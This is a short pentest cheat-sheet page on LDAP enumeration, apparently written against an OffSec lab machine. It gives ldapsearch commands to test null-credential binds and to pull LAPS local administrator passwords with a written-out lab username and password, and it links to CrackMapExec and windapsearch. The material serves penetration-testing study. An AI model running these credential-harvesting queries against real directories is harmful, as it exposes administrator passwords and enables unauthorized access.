LDAP - 389/636

Checking for null credentials 

ldapsearch -x -H ldap://192.168.73.122 -D '' -w ''  -b "DC=hutch,DC=offsec"

Authenticated LDAP Query for LAPS password

Authenicated LDAP queries will give you a whole lot of information the ms-MCS-Adm part of this command just filters the output so you so the LAPS password. 

ldapsearch -x -H ldap://hutch.offsec -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192'  -b "DC=hutch,DC=offsec" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

CrackMapExec can also be used to pull this information. Maybe even more easily. https://wiki.porchetta.industries/ldap-protocol

https://github.com/T3KX/Crackmapexec-LAPS

https://github.com/ropnop/windapsearch

https://www.geeksforgeeks.org/ldap-enumeration/

PreviousSMB - 139/445NextSQL - Port 3306

Last updated

Was this helpful?